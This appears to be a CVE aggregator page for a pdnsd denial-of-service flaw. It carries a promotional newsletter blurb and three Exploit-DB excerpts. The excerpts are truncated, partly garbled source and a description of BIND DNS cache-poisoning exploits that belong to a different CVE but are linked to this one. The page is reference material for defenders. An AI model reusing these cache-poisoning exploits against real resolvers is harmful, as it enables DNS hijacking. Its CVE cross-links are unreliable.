CVE-2008-4194
published 2008-09-24CVE-2008-4194: The p_exec_query function in src/dns_query.c in pdnsd before 1.2.7-par allows remote attackers to cause a denial of service (daemon crash) via a long DNS reply…
PriorityP426medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
6.93%
93.3th percentile
The p_exec_query function in src/dns_query.c in pdnsd before 1.2.7-par allows remote attackers to cause a denial of service (daemon crash) via a long DNS reply with many entries in the answer section, related to a "dangling pointer bug."
Affected
16 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pdnsd | pdnsd | <= 1.2.6-par | — |
| pdnsd | pdnsd | — | — |
| pdnsd | pdnsd | — | — |
| pdnsd | pdnsd | — | — |
| pdnsd | pdnsd | — | — |
| pdnsd | pdnsd | — | — |
| pdnsd | pdnsd | — | — |
| pdnsd | pdnsd | — | — |
| pdnsd | pdnsd | — | — |
| pdnsd | pdnsd | — | — |
| pdnsd | pdnsd | — | — |
| pdnsd | pdnsd | — | — |
| pdnsd | pdnsd | — | — |
| pdnsd | pdnsd | — | — |
| pdnsd | pdnsd | — | — |
| pdnsd | pdnsd | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BIND 9.x - Remote DNS Cache Poisoning
exploitdb·2008-07-25·CVSS 6.8
CVE-2008-4194 [MEDIUM] BIND 9.x - Remote DNS Cache Poisoning
BIND 9.x - Remote DNS Cache Poisoning
---
/*
* Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack
*
* Compilation:
* $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm
*
* Dependency: libdnet (aka libdumbnet-dev under Ubuntu)
*
* Author: marc.bevand at rapid7 dot com
*/
#define _BSD_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define DNSF_RESPONSE (1 size)
fprintf(stderr, "format_domain overflow\n"), exit(1);
buf[bufi++] = i - j;
memcpy(buf + bufi, name + j, i - j);
bufi += i - j;
j = i + 1;
}
i++;
}
if (bufi + 1 + 2 + 2 > size)
fprintf(stderr, "format_domain overflow\n"), exit(1);
buf[bufi++] = 0;
*len = bufi;
}
void format_qr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t
Exploit-DB
BIND 9.x - Remote DNS Cache Poisoning
exploitdb·2008-07-24·CVSS 6.8
CVE-2008-4194 [MEDIUM] BIND 9.x - Remote DNS Cache Poisoning
BIND 9.x - Remote DNS Cache Poisoning
---
from scapy import *
import random
# Copyright (C) 2008 Julien Desfossez
# http://www.solisproject.net/
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temp
Exploit-DB
BIND 9.4.1 < 9.4.2 - Remote DNS Cache Poisoning (Metasploit)
exploitdb·2008-07-23
CVE-2008-4194 BIND 9.4.1 < 9.4.2 - Remote DNS Cache Poisoning (Metasploit)
BIND 9.4.1
H D Moore
===============/========================================================
Description
This exploit targets a fairly ubiquitous flaw in DNS implementations
which allow the insertion of malicious DNS records into the cache of the
target nameserver. This exploit caches a single malicious nameserver
entry into the target nameserver which replaces the legitimate
nameservers for the target domain. By causing the target nameserver to
query for random hostnames at the target domain, the attacker can spoof
a response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
cache. This insertion completely replaces the original nameserver
recor
No writeups or analysis indexed.
http://www.phys.uu.nl/~rombouts/pdnsd.htmlhttp://www.phys.uu.nl/~rombouts/pdnsd/ChangeLoghttp://www.vupen.com/english/advisories/2008/2582https://exchange.xforce.ibmcloud.com/vulnerabilities/45594http://www.phys.uu.nl/~rombouts/pdnsd.htmlhttp://www.phys.uu.nl/~rombouts/pdnsd/ChangeLoghttp://www.vupen.com/english/advisories/2008/2582https://exchange.xforce.ibmcloud.com/vulnerabilities/45594
2008-09-24
Published